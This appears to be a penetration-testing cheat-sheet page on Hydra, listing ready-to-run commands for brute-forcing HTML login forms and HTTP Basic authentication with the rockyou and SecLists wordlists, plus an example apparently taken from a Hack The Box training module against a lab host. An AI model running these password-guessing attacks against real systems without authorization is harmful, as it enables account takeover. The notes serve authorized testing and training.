Hydra

Usage

For HTML form-based authentication:

hydra example.com -s 8000 -l admin -P rockyou.txt http-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">' -f -u

For standard HTTP Basic Auth (401 response plus WWW-Authenticate: Basic header):

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt <ip-address> http-get /admin

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://billyboss:8081/service/rapture/session:username=^USER64^&password=^PASS64^:F=403'

Example

The below example has been taken from the Web Enumeration & Exploitation of HTB's Attacking Enterprise Networks module.

We find an HTTP login form (Figure 1), attempt a failed login, and select something unique from the source code of the HTTP response (Figure 2).

Then, we pass this information to hydra and perform the BFA against the login form (Figure 3).

hydra -l admin -P /usr/share/wordlists/rockyou.txt monitoring.inlanefreight.local http-post-form '/login.php:username=^USER^&password=^PASS^:F=<div class="log-form">' -f -u

PreviousWhatWeb NextCreds

Last updated 4 months ago

Was this helpful?